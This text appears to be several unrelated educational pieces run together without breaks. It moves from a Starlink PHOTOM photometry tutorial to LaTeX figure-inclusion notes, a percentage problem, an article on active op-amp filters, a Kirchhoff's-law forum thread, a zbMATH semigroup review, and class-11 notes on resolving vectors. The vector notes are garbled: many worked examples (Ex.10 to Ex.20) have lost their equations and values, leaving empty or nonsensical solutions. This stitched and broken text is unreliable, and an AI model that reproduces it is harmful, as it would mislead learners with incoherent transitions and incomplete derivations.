• SKYMAG is essentially the arbitrary constant $A$ which appears in equations 14, 15 and 16. It is usually sensible to set it to an improbable value, such as 30 (as used here) so that the instrumental magnitudes measured by PHOTOM are not inadvertently confused with calibrated magnitudes. Conversely, if the absolute value of the sky background is known and used then the instrumental magnitudes will approximate to calibrated magnitudes, albeit without atmospheric extinction and colour corrections,
• other values, such as PADU and BIASLE will be specific to the data.
(7)
PHOTOM is now set up ready to measure stars and sky background. Type m and when prompted for the display device use xoverlay. The text boxes that appear towards the bottom of the display refer to the corresponding mouse buttons. Proceed as follows.
(a)
Position the cursor over the object to be measured and click the left mouse button or enter 1 from the keyboard.
(b)
Repeat the procedure for all the objects which you wish to measure.
(c)
To finish, click on the right mouse button or enter 0 from the keyboard and you will return to the PHOTOM ‘COMMAND’ prompt.
The resulting display will look something like Figure 8. As each star is measured the terminal or workstation will output the results (and echo them to the output file specified when starting PHOTOM):
COMMAND - PHOTOM /’Values’/ > m
DEVICE - Display device /@xwindows/ > xoverlay
Select operation according to screen menu
Left hand box - Press left hand mouse button
Centre box - Press centre mouse button
Right hand box - Press right hand mouse button
====================================================================
nx ny a e theta
384 256 8.00 0.000 0.0
x y mag magerr sky signal code
1 57.70 157.74 19.322 0.011 489.965 18675.065
2 58.90 232.74 18.571 0.007 493.119 37287.484
3 66.94 250.43 20.447 0.025 493.768 6622.757 E
4 81.58 65.64 17.059 0.003 489.962 150087.483
5 362.25 66.61 18.209 0.005 491.481 52030.981
COMMAND - PHOTOM /’Values’/ >
If you are working through the recipe the actual values you obtain will probably be slightly different because you will have positioned the apertures differently. The meaning of each of the columns is described in SUN/45. Notice the following:
• measurements of both sky and object are given,
• magnitude values are relative to an artificial sky value of 30,
• object 3 is the star measured at the top of the image. The inner aperture has crossed the edge of the frame, so some proportion of the flux has been lost. PHOTOM recognizes this problem and flags the result with an ‘E’ (for ‘edge’) in the code column.
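You can check the table for yourself: with SKYMAG set to 30, the instrumental magnitudes printed above are consistent with the relation mag = SKYMAG − 2.5 log₁₀(signal). A quick sketch (the precise handling of exposure time and error estimates is described in SUN/45):

```python
import math

def instrumental_mag(signal, skymag=30.0):
    """Instrumental magnitude from the integrated signal above sky."""
    return skymag - 2.5 * math.log10(signal)

# Two rows from the PHOTOM output above:
print(round(instrumental_mag(18675.065), 3))   # 19.322
print(round(instrumental_mag(150087.483), 3))  # 17.059
```

Both values reproduce the `mag` column for objects 1 and 4, confirming that these are instrumental magnitudes tied to the arbitrary SKYMAG zero point.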
(8)
It is also possible to use an interactive aperture to sample the background. Here representative areas of sky are sampled independently of the measured object. The procedure is as follows.
(a)
Type a to toggle the Annulus choice. The message ‘Interactive aperture in use’ should be displayed.
(b)
Type m
(c)
Move the cursor to a blank patch of sky. Usually the patch chosen will be close to the object to be measured. Click on the middle mouse button. An aperture corresponding to the patch of sky measured will be shown. You can repeat this procedure for several patches of sky if you wish. Note that the sky must be measured before measuring any objects.
(d)
Move the cursor over the object to be measured and click on the left mouse button (or enter 1 from the keyboard).
(e)
You can make further measurements of the objects and the sky background as you wish.
(f)
To finish click on the right mouse button (or enter 0 from the keyboard).
The resulting display will look something like Figure 9.
(9)
You should measure all the stars of interest in the current frame. Their instrumental magnitudes will be included in the output file written by PHOTOM. Alternatively, if you prefer, you can make a note of the instrumental magnitudes as they are displayed (though this approach is more prone to mistakes).
(10)
This recipe has shown the interactive use of PHOTOM. PHOTOM also contains an application called autophotom which allows PHOTOM to be used non-interactively (see SUN/45[22] for details).
11 Strictly speaking you must use display software which accesses the Starlink graphics database (see SUN/48[21]). However, you will not normally be aware of the graphics database and certainly do not need to know anything about it. It is simply a mechanism which allows different applications to co-operate in using the same plot.
12 An image displayed with the lutneg colour table mimics the appearance of a conventional astronomical photographic plate: stars appear as dark spots on a light background. Various other colour tables are available in KAPPA. For example, lutgrey sets up a positive grey-scale (light stars against a dark background) and lutheat sets up a pseudo-heat sequence.
13 The intensity profiles of the images of extended objects usually fall off more slowly with increasing radius than those of stars, and hence when working with extended objects it is necessary to choose an aperture sufficiently large to include the required fraction of the total light from the object.
## 9.1 Flexible inclusion of figures in different graphics formats
Unfortunately, no single graphics input format is supported by all three of LaTeX, pdflatex, and LaTeX2HTML.
Table 2: Graphics Support

| Package    | Input Format           | Output Format    |
|------------|------------------------|------------------|
| LaTeX      | .eps, .ps              | .dvi, .ps        |
| pdflatex   | .jpg, .pdf, .png, .tif | .pdf             |
| LaTeX2HTML | same as LaTeX          | .gif/.png, .html |
This complicates production of graphics-rich documents if PostScript, PDF and HTML output are all required. It is possible, however, to code a LaTeX figure environment call so that the same source text brings in different graphics files as needed by the different compilers. The following template shows how to do this, with \usepackage{graphicx} included in the document preamble:
\begin{figure}[thp]
\begin{center}
\includegraphics[width=4in]{fig1}
\caption{Caption text.}
\label{fig:labeltext}
\end{center}
\end{figure}
\includegraphics will search for the file fig1.eps when LaTeX is run, either directly or by running LaTeX2HTML. LaTeX2HTML will convert the input fig1.eps graphic into a .gif or .png file using the LaTeX engine, then the dvips, Ghostscript and netpbm utilities. The same \includegraphics call will also search for whichever of fig1.pdf or fig1.jpg is present in the source directory if pdflatex is run to produce .pdf output.
The example shown requests that the graphic be reproduced with a width of 4 inches. \includegraphics also lets you specify a scale factor, angle of rotation, image width, and/or image height, for example:
\includegraphics[scale=0.5]{<filename>}
\includegraphics[angle=45]{<filename>}
\includegraphics[width=2in]{<filename>}
\includegraphics[totalheight=4in]{<filename>}
\includegraphics[scale=0.5,totalheight=4in]{<filename>}
# What number do we get if we decrease 208 by 35%?
You end up with 135.20
#### Explanation:
We can do this a couple of different ways.
One way is to multiply 208 by 35%, subtract that result from 208, and see what we end up with:
$208 \times 35\% = 208 \times 0.35 = 72.80$
$208 - 72.8 = 135.20$
We can also work the problem by seeing what's left after we're done decreasing.
Think of this question this way - if we decrease a number, say 100, by a percentage, say 35%, what percentage will be left?
We can work this out by taking 100 things and decreasing it by 35% - 35% of 100 is 35 things - and so we take away 35 things and are left with 65 things, which is 65% of 100.
So we can say that when we decrease by 35%, we are left with $100\% - 35\% = 65\%$.
To decrease 208 by 35%, we can multiply by 65% to see what will be left:
$208 \times 65\% = 208 \times 0.65 = 135.20$
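Both routes are one-liners in code; a quick check in Python (the function name is just for illustration):

```python
def decrease_by_percent(value, pct):
    # Decreasing by pct% is the same as keeping (100 - pct)% of the value.
    return value * (100 - pct) / 100

print(decrease_by_percent(208, 35))  # 135.2
print(208 - 208 * 35 / 100)          # same answer via subtraction
```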
In this article, we’ll compare active and passive filters and look at some common second-order active topologies.
### Active vs. Passive
If your filter consists of nothing more than resistors, capacitors, and inductors, you have a passive filter. The circuit becomes “active” when you incorporate an active component, e.g., a transistor. Theoretically, you could design an active-filter circuit using an individual transistor in conjunction with passive components, but in practice, the active component of choice is an operational amplifier. Op-amps offer performance advantages over individual transistors, and they also simplify the process of designing and analyzing a filter circuit. So as you read this article, keep in mind that for all practical purposes “active filter” means “op-amp-based active filter.”
### Passive ≠ Bad
It is important to understand that active filters are not inherently “better” than passive filters. On the contrary, I prefer passive filters and use them whenever possible. Some advantages of the old-fashioned approach are the following:
• There is no need to worry about the nonideal characteristics of the op-amp—offset voltage, bandwidth limitations, noise, and so on.
• Breadboarding or PCB layout is simpler and cleaner without the power and ground connections required by the op-amp.
• Passive circuits are more straightforward and hence less subject to design errors—for example, compare a resistor-inductor-capacitor (RLC) low-pass filter (see the next section) to an equivalent Sallen–Key circuit (scroll down to the “Sallen–Key” section).
Active filters certainly have their advantages though. The most prominent benefit that applies to both first-order and second-order filters is the improved impedance characteristics. Op-amps provide high input impedance and low output impedance, and thus an op-amp-based active filter can outperform a passive implementation when the incoming signal has relatively high source impedance or when the output signal must drive relatively low load impedance.
Another advantage is gain: If the signal needs to be not only filtered but also amplified, you really have no choice but to use an active filter—either a specific active-filter topology or a passive-filter-plus-amplifier arrangement.
Before we continue, I should point out that it is certainly possible to create a second-order active filter that consists of an op-amp and two first-order filters. The two filter stages are connected in series, with the op-amp buffering the output of the first stage. These “cascaded” filters inevitably produce a gradual transition from passband to stopband, resulting in nonlinear phase response and significant attenuation of signals near the end of the passband. The two second-order topologies discussed below are usually preferable because they allow you to optimize an individual circuit for sharper transition from passband to stopband, minimal passband attenuation, or linear phase response.
### The Nefarious Inductor
As indicated by its title, this article focuses on second-order active filters, i.e., filters that have two poles in their transfer functions and thus achieve steeper roll-off. Passive filters need two energy storage elements—a capacitor and an inductor—to provide a second-order response . . . and this is where the trouble begins. Here is a second-order RLC low-pass filter, with equations for the cutoff frequency (fc) and the quality factor (Q):
$f_c=\frac{1}{2\pi\sqrt{LC}}\ \ \ \ \ \ \ \ \ Q=\left(2\pi f_c\right)\times CR$
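Plugging in representative values shows how the formulas behave. The component values below are my own illustrative assumptions, not taken from the article:

```python
import math

# Assumed example components: L = 10 mH, C = 100 nF, R = 1 kOhm
L, C, R = 10e-3, 100e-9, 1e3

f_c = 1 / (2 * math.pi * math.sqrt(L * C))  # cutoff frequency (Hz)
Q = (2 * math.pi * f_c) * C * R             # quality factor

print(round(f_c, 1))  # ~5032.9 Hz
print(round(Q, 2))    # ~3.16
```

Note how fc depends only on the L–C product, while R tunes Q (and hence the peaking near cutoff) independently.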
This otherwise respectable filter is tainted by its association with the inductor. The fact is, inductors are downright unpopular, and here’s why:
• They’re bulky, and as you have probably noticed, electronics manufacturers want to make their widgets smaller, not bigger.
• Inductors are not particularly compatible with integrated-circuit manufacturing techniques:
• You can’t get much inductance out of an IC inductor, which means the cutoff frequency of the filter can’t go very low.
• IC inductors are seriously nonideal; the various parasitic impedances of the IC environment are more problematic than those experienced by discrete inductors.
• Inductors generate more electromagnetic interference (EMI) than resistors and capacitors, and they are also more susceptible to EMI.
The clear conflict between inductors and the trends that dominate the electronics industry—miniaturization, monolithic fabrication, wireless functionality—is a major motivation for pursuing second-order filters that do not require inductance.
### Antoniou and His Simulated Inductor
One way to avoid the problems associated with inductors is to use a circuit that behaves like an inductor yet requires only resistors, capacitors, and op-amps. The following “inductance-simulation circuit” was invented by Andreas Antoniou:
$equivalent\ inductance:\ L=\frac{R_1R_3R_4C_1}{R_2}$
How Professor Antoniou ever figured this out is beyond me. In any event, I’m not going to dwell on this circuit because the Sallen–Key and Multiple Feedback (MFB) topologies are a simpler and more direct route to second-order filter performance. It’s good to be aware, though, that various RLC filters can be implemented without inductors by using an inductance-simulation circuit.
### Sallen–Key
A Sallen–Key filter gives you two poles with only one op-amp and a few passives. The following is a Sallen–Key implementation of a unity-gain low-pass filter.
$f_c=\frac{1}{2\pi\sqrt{R_1C_1R_2C_2}}$
It is often the case that there is no need to amplify any portion of the input signal; the filter is there to suppress unwanted frequencies, and it’s fine if the frequencies of interest merely pass through. These unity-gain applications are common enough to make the Sallen–Key a very popular filter, despite the fact that the MFB topology is advantageous when the gain becomes significantly higher than unity.
Let’s think about what happens at low frequencies. C1 and C2 become open circuits, and the resistors become irrelevant because the current flowing into the op-amp’s positive input terminal is negligible. Thus, we are left with a voltage follower. This means that 1) the Sallen–Key filter does not invert the signal and 2) the gain will be almost exactly unity without any dependence on component values. As you will see in the next section, the gain of the MFB circuit is determined by component values, even at unity gain, and this explains why the Sallen–Key topology is preferred for unity-gain applications.
For much more information on the Sallen–Key topology, click here (PDF) for a Texas Instruments app note that just might tell you everything you ever wanted to know about op-amp-based active filters. Another valuable resource is this online filter design tool, which will help you with Sallen–Key low-pass and high-pass circuits.
### Multiple Feedback
Here is an MFB low-pass circuit:
$f_c=\frac{1}{2\pi\sqrt{R_2R_3C_1C_2}}$
$DC\ gain\ =\ \frac{R_3}{R_1}$
If you replace the capacitors with open circuits and ignore R2 (again, because the input current is negligible), you will recognize the standard op-amp inverting configuration:
Thus, MFB is an inverting topology. You might recall that there is no inverting version of a voltage follower; if you need a unity-gain inverting op-amp circuit, you have to use an inverting amplifier with R1 = R3. The same applies to the MFB topology: for unity gain, you set R1 = R3, which means that the accuracy of your gain depends on the precision of your resistors. As the gain increases, though, an MFB circuit actually becomes less sensitive to component tolerances than an equivalent Sallen–Key implementation, so MFB is usually a better choice for higher-gain filters. The app note mentioned in the previous section is also a great resource for MFB circuits, and the same online filter tool can help you with MFB filter design.
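As a quick sanity check of the two MFB formulas above, here is a unity-gain example with assumed equal component values (illustrative only; a real design must also satisfy the Q constraints covered in the TI app note):

```python
import math

# Assumed values for a unity-gain MFB low-pass (not from the article)
R1, R2, R3 = 10e3, 10e3, 10e3   # ohms; R1 = R3 gives unity (inverting) gain
C1, C2 = 10e-9, 10e-9           # farads

f_c = 1 / (2 * math.pi * math.sqrt(R2 * R3 * C1 * C2))  # cutoff frequency
dc_gain = R3 / R1                                       # magnitude of DC gain

print(round(f_c, 1))  # ~1591.5 Hz
print(dc_gain)        # 1.0
```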
### Conclusion
We’ve covered quite a bit of introductory information related to why we use second-order active filters and how we create second-order circuits using a single op-amp in conjunction with capacitors and resistors. However, we’ve only scratched the surface of this expansive subject. Keep an eye out for future articles that explore these and related topics in greater detail.
1. rvc
[drawing]
2. rvc
3. rvc
[drawing]
4. arindameducationusc
wow... nice one.. i just had my dinner... was about to sleep.. would you mind if I do tomorrow morning?
5. IrishBoy123
i can have a try later today
6. Michele_Laino
I think that we have to apply the second and first principle of Kirchhoff
7. rvc
yep
8. Michele_Laino
[drawing] we have to suppose the existence of those currents, I1, ..., I6
9. rvc
okay
10. Michele_Laino
now, we have to write the first principle of Kirchhoff at each node
11. rvc
incoming currents = outgoing currents
12. Michele_Laino
yes! or algebraic sum of currents=0
13. rvc
yep
14. Michele_Laino
I label each node as below: [drawing]
15. rvc
oh okay
16. Michele_Laino
for node A: $\Large {I_2} + 20 - {I_3} = 0$
17. Michele_Laino
for node B: $\Large {I_3} - {I_4} - 120 = 0$
18. Michele_Laino
for node C: $\Large {I_4} + 110 - {I_5} = 0$
19. Michele_Laino
for node D $\Large {I_5} - {I_6} - 60 = 0$
20. Michele_Laino
for node Y: $\Large {I_6} + 80 - {I_1} = 0$
21. rvc
can we assume current through ab as I1 and ax as 20-I1 ?
22. Michele_Laino
for node X: $\Large {I_1} - {I_2} - 30 = 0$
23. Michele_Laino
with those equations, we have expressed the conservation of electrical charge
24. Michele_Laino
now, we have to apply the second principle of Kirchhoff, namely the subsequent equation for the electrostatic field E: $\Large \nabla \times {\mathbf{E}} = 0$ in order to do that we have to establish a positive sense in our circuit, like this: [drawing]
25. Michele_Laino
here is the missing equation: $\large {V_{XY}} + 0.01{I_2} + 0.01{I_3} + 0.03{I_4} + 0.01{I_5} + 0.02{I_6} = 0$
26. Michele_Laino
so, you have to determine all currents, I1,...,I6, then substituting into last equation, you will get the requested voltage drop Vxy
27. Michele_Laino
@rvc
28. mathmate
Hmm, There are 6 equations for 7 unknowns! @Michele_Laino I put 5 equations for the joints (the sixth is redundant) and the Kirchhoff's second law as 0.02*I1+0.01*I2+0.01*I3+0.03*I4+0.01*I5+0.02*I6=0 instead of using Vxy, and I seem to get satisfactory results, with I4 and I6 negative. Do you get the similar results? @rvc
29. Michele_Laino
if we collect all those equations above, we get the complete system as below: $\Large \left\{ \begin{gathered} {I_2} + 20 - {I_3} = 0 \hfill \\ \hfill \\ {I_3} - {I_4} - 120 = 0 \hfill \\ \hfill \\ {I_4} + 110 - {I_5} = 0 \hfill \\ \hfill \\ {I_5} - {I_6} - 60 = 0 \hfill \\ \hfill \\ {I_6} + 80 - {I_1} = 0 \hfill \\ \hfill \\ {I_1} - {I_2} - 30 = 0 \hfill \\ \hfill \\ {V_{XY}}{\text{ }} + {\text{ }}0.01{I_2}{\text{ }} + {\text{ }}0.01{I_3}{\text{ }} + {\text{ }} \hfill \\ {\text{ + }}0.03{I_4}{\text{ }} + {\text{ }}0.01{I_5}{\text{ }} + {\text{ }}0.02{I_6}{\text{ }} = {\text{ }}0 \hfill \\ \end{gathered} \right.$
30. mathmate
What I was saying is that there are 5 independent equations out of the first 6, so the last one will fill the void by expression Vxy as 0.02*I1. Then we get to have 6 equations, and 6 unknowns (I1 to I6).
31. IrishBoy123
yes, first 5 plus 0.02*I1+0.01*I2+0.01*I3+0.03*I4+0.01*I5+0.02*I6=0 gets there! [ 61. 31. 51. -69. 41. -19.]
32. mathmate
Yep, I got the same answers.
33. mathmate
Don't forget to find Vxy=61*0.02=1.22 V... etc.
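The whole calculation in this thread can be reproduced in a few lines of plain Python: chaining the five independent node (KCL) equations expresses every current as I1 plus a constant offset, and the KVL equation then fixes I1.

```python
# Branch resistances (ohms) for I1..I6, from the KVL equation above
R = [0.02, 0.01, 0.01, 0.03, 0.01, 0.02]
# Chaining the node equations gives I_k = I1 + c_k:
#   I2 = I1 - 30, I3 = I1 - 10, I4 = I1 - 130, I5 = I1 - 20, I6 = I1 - 80
c = [0, -30, -10, -130, -20, -80]

# KVL: sum(R_k * (I1 + c_k)) = 0  =>  I1 = -sum(R_k * c_k) / sum(R_k)
I1 = -sum(r * ck for r, ck in zip(R, c)) / sum(R)
currents = [I1 + ck for ck in c]
Vxy = R[0] * currents[0]

print(currents)  # ~[61, 31, 51, -69, 41, -19]
print(Vxy)       # ~1.22
```

This matches the currents quoted by IrishBoy123 and the voltage drop Vxy = 1.22 V found by mathmate.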
## Tolerance distributive and tolerance modular varieties of commutative semigroups. (English) Zbl 0614.20043
A “tolerance” on a semigroup $$S$$ is a reflexive and symmetric subsemigroup of $$S\times S$$. The author proves the following theorem: a variety $$V$$ of commutative semigroups is tolerance modular, that is, each member of $$V$$ has a modular lattice of tolerances, if and only if $$V$$ satisfies an identity $$xy=xyz^n$$ for some positive integer $$n$$. Further, amongst such varieties, only the variety of “zero”, or “null”, semigroups and the trivial variety are tolerance distributive.
Reviewer: P.R.Jones
### MSC:
20M07 Varieties and pseudovarieties of semigroups
08A30 Subalgebras, congruence relations
08B10 Congruence modularity, congruence distributivity
20M14 Commutative semigroups
### References:
[1] Chajda I.: Lattices of compatible relations. Arch. Math. (Brno) 13 (1977), 89-96. · Zbl 0372.08002
[2] Chajda I., Zelinka B.: Lattices of tolerances. Čas. pěst. mat. 102 (1977), 10-24. · Zbl 0354.08011
[3] Chajda I.: Distributivity and modularity of lattices of tolerance relations. Algebra Universalis 12 (1981), 247-255. · Zbl 0469.08003
[4] Clifford A. H., Preston G. B.: The algebraic theory of semigroups. Vol. I. Am. Math. Soc., 1961. · Zbl 0111.03403
[5] Petrich M.: Introduction to Semigroups. Merill Publishing Company, 1973. · Zbl 0321.20037
[6] Pondělíček B.: Modularity and distributivity of tolerance lattices of commutative separative semigroups. Czech. Math. J. 35 (1985), 333-337. · Zbl 0573.20062
[7] Zelinka B.: Tolerance in algebraic structures II. Czech. Math. J. 25 (1975), 175-178. · Zbl 0316.08001
[8] Ore O.: Structures and group theory II. Duke Math. J. 4 (1938), 247-269. · Zbl 0020.34801
This reference list is based on information provided by the publisher or from digital mathematics libraries. Its items are heuristically matched to zbMATH identifiers and may contain data conversion errors. It attempts to reflect the references listed in the original paper as accurately as possible without claiming the completeness or perfect precision of the matching.
# Resolution of Vectors: Motion in a Plane - Notes | Study Physics Class 11 - NEET
7. RESOLUTION OF VECTORS
If $\vec{a}$ and $\vec{b}$ are any two non-zero vectors in a plane with different directions and $\vec{A}$ is another vector in the same plane, then $\vec{A}$ can be expressed as a sum of two vectors: one obtained by multiplying $\vec{a}$ by a real number and the other obtained by multiplying $\vec{b}$ by another real number.
$\vec{A} = l\vec{a} + m\vec{b}$ (where $l$ and $m$ are real numbers)
We say that $\vec{A}$ has been resolved into two component vectors, namely $l\vec{a}$ and $m\vec{b}$, along $\vec{a}$ and $\vec{b}$ respectively. Hence one can resolve a given vector into two component vectors along a set of two vectors; all three lie in the same plane.
7.1 Resolution along rectangular components:
It is convenient to resolve a general vector along the axes of a rectangular coordinate system using vectors of unit magnitude, which we call unit vectors. $\hat{i}$, $\hat{j}$ and $\hat{k}$ are unit vectors along the x, y and z-axes, as shown in the figure below.
7.2 Resolution in two Dimensions
Consider a vector $\vec{A}$ that lies in the xy plane, as shown in the figure:
$\vec{A} = A_x\hat{i} + A_y\hat{j}$
The quantities $A_x$ and $A_y$ are called the x- and y-components of the vector $\vec{A}$.
$A_x$ is itself not a vector, but $A_x\hat{i}$ is a vector, and so is $A_y\hat{j}$.
$A_x = A\cos\theta$ and $A_y = A\sin\theta$
It is clear from the above equations that a component of a vector can be positive, negative or zero depending on the value of $\theta$. A vector can be specified in a plane in two ways:
(a) by its magnitude $A$ and the direction $\theta$ it makes with the x-axis; or
(b) by its components $A_x$ and $A_y$, with $A = \sqrt{A_x^2 + A_y^2}$ and $\theta = \tan^{-1}(A_y/A_x)$.
Note: If $A = A_x$ then $A_y = 0$, and if $A = A_y$ then $A_x = 0$; i.e., the component of a vector perpendicular to itself is always zero. The rectangular components of each vector and those of the sum are shown in the figure.
We saw that
$\vec{C} = \vec{A} + \vec{B}$
is equivalent to both
$C_x = A_x + B_x$
and $C_y = A_y + B_y$
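These component rules are easy to exercise numerically. The short sketch below (magnitudes and angles chosen arbitrarily for illustration) resolves two vectors, adds them component by component, and then recovers the magnitude and direction of the sum:

```python
import math

def components(magnitude, angle_deg):
    """Resolve a vector into rectangular components: (A cos(theta), A sin(theta))."""
    th = math.radians(angle_deg)
    return magnitude * math.cos(th), magnitude * math.sin(th)

ax, ay = components(5, 37)    # roughly (4, 3)
bx, by = components(10, 53)   # roughly (6, 8)

cx, cy = ax + bx, ay + by     # Cx = Ax + Bx and Cy = Ay + By
C = math.hypot(cx, cy)                    # magnitude of the sum
theta = math.degrees(math.atan2(cy, cx))  # direction of the sum (degrees)
```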
Refer to figure (b):
vector $\vec{R}$ has been resolved along two axes x and y that are not perpendicular to each other, making angles $\alpha$ and $\beta$ with $\vec{R}$. Applying the sine law in the triangle shown, we have
$\dfrac{R}{\sin(\alpha+\beta)} = \dfrac{R_x}{\sin\beta} = \dfrac{R_y}{\sin\alpha}$
or $R_x = \dfrac{R\sin\beta}{\sin(\alpha+\beta)}$ and $R_y = \dfrac{R\sin\alpha}{\sin(\alpha+\beta)}$
If $\alpha+\beta = 90°$, $R_x = R\sin\beta$ and $R_y = R\sin\alpha$.
Ex.7 Resolve the vector $\vec{A} = A_x\hat{i} + A_y\hat{j}$ along, and perpendicular to, a line which makes an angle of 60° with the x-axis.
Sol.
The component along the line is $|A_y\cos 30° + A_x\cos 60°|$ and the component perpendicular to the line is $|A_x\sin 60° - A_y\sin 30°|$.
Ex.8 Resolve a weight of 10 N in two directions which are parallel and perpendicular to a slope inclined at 30° to the horizontal.
Sol. Component perpendicular to the plane:
$W_\perp = W\cos 30° = (10)\dfrac{\sqrt{3}}{2} = 5\sqrt{3}$ N
and component parallel to the plane:
$W_\parallel = W\sin 30° = (10)\dfrac{1}{2} = 5$ N
Ex.9 Resolve horizontally and vertically a force F = 8 N which makes an angle of 45° with the horizontal.
Sol. Horizontal component of $\vec{F}$ is
$F_H = F\cos 45° = (8)\dfrac{1}{\sqrt{2}} = 4\sqrt{2}$ N
and vertical component of $\vec{F}$ is
$F_V = F\sin 45° = (8)\dfrac{1}{\sqrt{2}} = 4\sqrt{2}$ N Ans.
8. PROCEDURE TO SOLVE THE VECTOR EQUATION
$\vec{A} + \vec{B} = \vec{C}$ ...(1)
(a) There are 6 variables in this equation, which are the following:
(1) the magnitude of $\vec{A}$ and its direction,
(2) the magnitude of $\vec{B}$ and its direction,
(3) the magnitude of $\vec{C}$ and its direction.
(b) We can solve this equation if we know the values of 4 variables. [Note: two of them must be directions.]
(c) If we know the directions of any two vectors, then we put those two on the same side of the equation and the third on the other side.
For example, if we know the directions of $\vec{A}$ and $\vec{B}$ and the direction of $\vec{C}$ is unknown, then we write the equation as $\vec{A} + \vec{B} = \vec{C}$.
(d) Then we draw a vector diagram according to the equation and resolve the vectors to find the unknown values.
Ex.10 Find the net displacement of a particle from its starting point if it undergoes two successive displacements: $\vec{A}$, 37° North of West, and $\vec{B}$, 53° North of East. [The magnitudes were given in a figure not reproduced here.]
Sol. Resolve each displacement along the west-east axis (x-axis) and the south-north axis, add the components, and measure the angle of the resultant from the west-east axis (x-axis).
Ex.11 Find the magnitude of $\vec{B}$ and the direction of $\vec{A}$, given that $\vec{A}$ makes an angle of 37° and $\vec{B}$ makes an angle of 53° with the x-axis, one given magnitude equals 10 and the other 5. [Parts of this example were images not reproduced here.]
Sol.
B = 5 (a magnitude cannot be negative), and the angle made by $\vec{A}$ follows from resolving the equation into components.
Ex.12 Find the magnitude of F1 and F2. If F1, F2 make angle 30° and 45° with F3 and magnitude of F3 is 10 N. (given = )
Sol.
9. SHORT-METHOD
If there are two vectors A and B, and their resultant makes an angle α with A and β with B, then A sin α = B sin β.
This means the component of A perpendicular to the resultant is equal in magnitude to the component of B perpendicular to the resultant.
Ex.13 If two vectors A and B make angles 30° and 60° with their resultant, and B has magnitude equal to 10, then find the magnitude of A.
Sol. B sin 60° = A sin 30°
⇒ 10 sin 60° = A sin 30°
⇒ A = 10 sin 60°/sin 30° = 10√3
Ex.14 If A and B have an angle of 60° between them, their resultant makes an angle of 45° with A, and A has magnitude equal to 10, then find the magnitude of B.
Sol. Here α = 45° and β = 60° − 45° = 15°
so A sin α = B sin β
10 sin 45° = B sin 15°
So B = 10 sin 45°/sin 15°
= 10(√3 + 1) ≈ 27.3
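The short method in Ex.14 can be verified numerically (the helper name is ours):

```python
import math

def other_magnitude(a, alpha_deg, beta_deg):
    """From A*sin(alpha) = B*sin(beta), return B given A and the angles
    (in degrees) that A and B make with the resultant."""
    return a * math.sin(math.radians(alpha_deg)) / math.sin(math.radians(beta_deg))

# Ex.14: A = 10, alpha = 45 deg, beta = 15 deg  ->  B = 10*(sqrt(3) + 1)
B = other_magnitude(10.0, 45.0, 15.0)
```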
10. ADDITION AND SUBTRACTION IN COMPONENT FORM :
Suppose there are two vectors in component form, A = ax î + ay ĵ + az k̂ and B = bx î + by ĵ + bz k̂. Then the addition and subtraction between these two are
A ± B = (ax ± bx) î + (ay ± by) ĵ + (az ± bz) k̂
Also, if we have a third vector C = cx î + cy ĵ + cz k̂ in component form, and this vector is added to or subtracted from the addition or subtraction of the above two vectors, then the same rule applies component by component.
Note : The modulus (magnitude) of vector A is given by |A| = √(ax² + ay² + az²)
Ex.15 Obtain the magnitude of if
and
Sol.
Magnitude of
= Ans.
Ex.16 Find A + B and A − B if A makes an angle of 37° with the positive x-axis and B makes an angle of 53° with the negative x-axis, as shown, and the magnitude of A is 5 and that of B is 10.
Sol.
for
+ =
so the magnitude of resultant will be = =
and have angle θ = from negative x - axis towards up
for
So the magnitude of resultant will be
=
and have angle from positive x-axis towards down.
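Component-wise addition and subtraction can be sketched in Python. The sample components (4, 3) and (−6, 8) assume the usual 3-4-5 approximations sin 37° ≈ 3/5 and sin 53° ≈ 4/5, and assume B points up and to the left, as the missing figure suggests:

```python
import math

def add(a, b):
    return tuple(x + y for x, y in zip(a, b))

def sub(a, b):
    return tuple(x - y for x, y in zip(a, b))

def magnitude(a):
    return math.sqrt(sum(x * x for x in a))

# A = 4i + 3j (|A| = 5 at ~37 deg), B = -6i + 8j (|B| = 10 at ~53 deg
# from the negative x-axis)
A, B = (4.0, 3.0), (-6.0, 8.0)
s, d = add(A, B), sub(A, B)
```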
11. MULTIPLICATION OF VECTORS (The Scalar and vector products) :
11.1 Scalar Product
The scalar product or dot product of any two vectors A and B, denoted as A · B (read A dot B), is defined as the product of their magnitudes with the cosine of the angle between them.
Thus, A · B = AB cos θ
(here θ is the angle between the vectors)
Properties :
• It is always a scalar, which is positive if the angle between the vectors is acute (i.e. θ < 90°) and negative if the angle between them is obtuse (i.e. 90° < θ ≤ 180°)
• It is commutative, i.e. A · B = B · A
• It is distributive, i.e. A · (B + C) = A · B + A · C
• As by definition A · B = AB cos θ, the angle between the vectors is θ = cos⁻¹[(A · B)/AB]
Geometrically, B cos θ is the projection of B onto A, and A cos θ is the projection of A onto B.
Component of B along A = B cos θ = (A · B)/A (projection of B on A)
Component of A along B = A cos θ = (A · B)/B (projection of A on B)
• Scalar product of two vectors will be maximum when cosθ = max = 1, i.e., θ = 0°,
i.e., vectors are parallel ⇒ (A · B)max = AB
• If the scalar product of two non-zero vectors vanishes then the vectors are perpendicular.
• The scalar product of a vector by itself is termed as self dot product and is given by
A · A = AA cos 0° = A²
• In case of a unit vector n̂ : n̂ · n̂ = (1)(1) cos 0° = 1
In case of orthogonal unit vectors î, ĵ, k̂ : î · î = ĵ · ĵ = k̂ · k̂ = 1 and î · ĵ = ĵ · k̂ = k̂ · î = 0
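The properties above are easy to verify numerically (the helper names are ours):

```python
import math

def dot(a, b):
    return sum(x * y for x, y in zip(a, b))

def angle_between(a, b):
    """theta = acos(a.b / (|a||b|)), returned in degrees."""
    cos_t = dot(a, b) / (math.sqrt(dot(a, a)) * math.sqrt(dot(b, b)))
    return math.degrees(math.acos(cos_t))

i_hat, j_hat = (1.0, 0.0, 0.0), (0.0, 1.0, 0.0)
theta = angle_between((1.0, 0.0, 0.0), (1.0, 1.0, 0.0))
```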
Ex.17 If the vectors and are perpendicular to each other. Find the value of a?
Sol. If vectors and are perpendicular
⇒
⇒ a² − 2a − 3 = 0 ⇒ a² − 3a + a − 3 = 0
⇒ a(a − 3) + 1(a − 3) = 0 ⇒ (a − 3)(a + 1) = 0 ⇒ a = −1, 3
Ex.18 Find the component of along ?
Sol. Component of along is given by hence required component
=
Ex.19 Find angle between and ?
Sol. We have cos θ = (A · B)/AB
cosθ = = θ = cos-1
Ex.20 (i) For what value of m the vector is perpendicular to
(ii) Find the component of vector along the direction of ?
Sol.
(i) m = -10 (ii)
Important Note :
Components of b along and perpendicular to a.
Let a and b represent the two (non-zero) given vectors, drawn from a common origin O as OA and OB respectively. Draw BM perpendicular to OA.
From ΔOMB, OB = OM + MB, so b = OM + MB.
